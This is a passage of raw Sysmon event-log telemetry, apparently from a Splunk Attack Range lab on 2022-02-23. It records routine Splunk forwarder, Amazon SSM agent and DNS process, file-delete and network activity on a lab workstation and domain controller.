Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1767-6216-0E05-000000003902}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:51.253{4F8D34B0-1767-6216-0E05-000000003902}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:52.861{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C668E43A4456E3ABD4AB57B62447EC4C,SHA256=8FFEEA4D17C0D0B1DD59918DCB92F89D654BA1259C17CD2C0DB26348A45E12BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:52.214{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EF9C900BF5E3D6717DFEC3082D790E5,SHA256=6946487AB271A28E4A430EF7A307537EE35AA24AD08F40BFBC02A68DDF390967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:52.330{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4789D190E06DDEF64D4FA10C86C59EF2,SHA256=633C5EB05518CD64719EF6D3EAB0836F59BD5EB6E8D11CEB5AB792C9BDE1E763,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:53.924{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8D16DA5DEFB77B04A68FC9F5AF805B6,SHA256=144995A3448494325DDA205A6EC89C1A0AD8D7594A4737979D87A704D9C72C37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:53.865{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-158MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:53.229{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=368338D6484BE28CFB6C320A8A92F276,SHA256=E388869B52A54C5DD66E8C9D8C03DFA35EC56AB5F09CA77BD91DE63A9E9B754A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:54.924{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB947C289F8EA157722E370EDDF1AE76,SHA256=B9FCFF6B82A06105DC8952B773A92DFDC922E9EAE07B6E9E778D643A4756295C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:54.878{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-159MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:52.809{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local57106- 354300x8000000000000000297377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:52.808{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65535- 354300x8000000000000000297376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:52.807{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50790- 354300x8000000000000000297375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:52.806{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58070- 354300x8000000000000000297374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:52.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49445-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:54.245{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37317905E230FFF3BF308B64138DF12,SHA256=D0CA12C38177A2187B0CCCF592DF4606D70B6D6B1E3DD9BABE6842AA44B50FAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:55.939{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9F68E761FEF3665E74CB2E0B0278D2E,SHA256=F278303D53C42D136BA45D430D08A575AF829DDDDCF4D096A03F260AB035ED40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:55.245{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5E226AACA530DC7A98FC9D3F6BBE479,SHA256=81D1809D6AE17E474C09122C0CCFE3F8582150A7BE53BEFBC078BACED76416EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:53.593{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51637-false10.0.1.12-8000- 23542300x8000000000000000297381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:56.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B83F880291DD5A2634EBA73C40E41397,SHA256=406492A93B84CAD1A5C8621809870DC292BB67CE65629CF210B63DBEF15AA0A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:57.276{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4815E7DCF2248C949C047EB036708D1B,SHA256=0127ADDB5989AA448D6BADF68F7202D4CB4EB4E54438525A0C4557AAA93D1115,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:57.064{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F49201F575FABEDBAA0195638EBFAF85,SHA256=559B78386F0D18AB03ADCDB5180E194E9C9AE27C90AC2EFFF481704B2E25036C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:58.291{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEF57244569CFD15789F1B913568CA68,SHA256=00F531273BDE13D9E0C4B7475976F6B17A697900388C73C8A80E4A574BFB6D78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:58.189{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA5AEC2255394F2B3ADA0B3E995B6BF,SHA256=622046B9A3EAB31A4C58C49BF214CE8860E4E0EE4EDAB9B0DB1DD9E18459084C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:59.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=904F63A9BA74990D515EE1ED8EEEE712,SHA256=BA24744B03E662C9646D9DACBB29098AD3689FECBE5EB9B98578F64402FE6EC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:59.309{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C97564A9E2B1AD4E4A37751CBB84A26,SHA256=C7722E322491E542C066E24DE40FF2AA211DEB909C6829965D332FDDE9AD1EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:00.455{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=351B89DC01819146C431E871213559FD,SHA256=A50D8EAD40398214A3E7226AE5CE69E3A5AE074B20EE26358BB34C69C913C204,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:58.564{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49446-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:00.327{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=676F1FBBDD1539CBDB69E9E61D2B00A4,SHA256=D9A50E1BCA816A5BF223B9170028F201D33D38F961FF75561BE3EA23DCE1300A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:01.502{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=315E32385938EA9B427B70F1C117D18D,SHA256=EEB5072C4FCE65157147B1BED2712611D526C5A5748DE77A66E9F0FE5B24DB45,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.557{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1771-6216-2807-000000003802}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.557{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.557{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.542{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1771-6216-2807-000000003802}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.542{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1771-6216-2807-000000003802}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.543{C8EA50B7-1771-6216-2807-000000003802}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:01.373{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A79D75965631F1A47BAA7786FED3E03,SHA256=07A202DBA0BDD522224C940E910C2A6D82ACB576E49C9279F9FFB42D0F69F321,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:02.502{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACF0AA5E6DF670F0D054BA755EA3BFDD,SHA256=7552697E30C25FFA235F0F905DDD49183B0F09DB46A7F6A10D0FDA58ED96BC16,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.509{C8EA50B7-1772-6216-2907-000000003802}41604240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.378{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC33BB274EEC446A83C50B07B133E527,SHA256=B7591DBE8209154384F45518C9F9E9EB306BAF88C87A05B7D7F7E94C759E8AFD,IMPHASH=00000000000000000000000000000000falsetrue 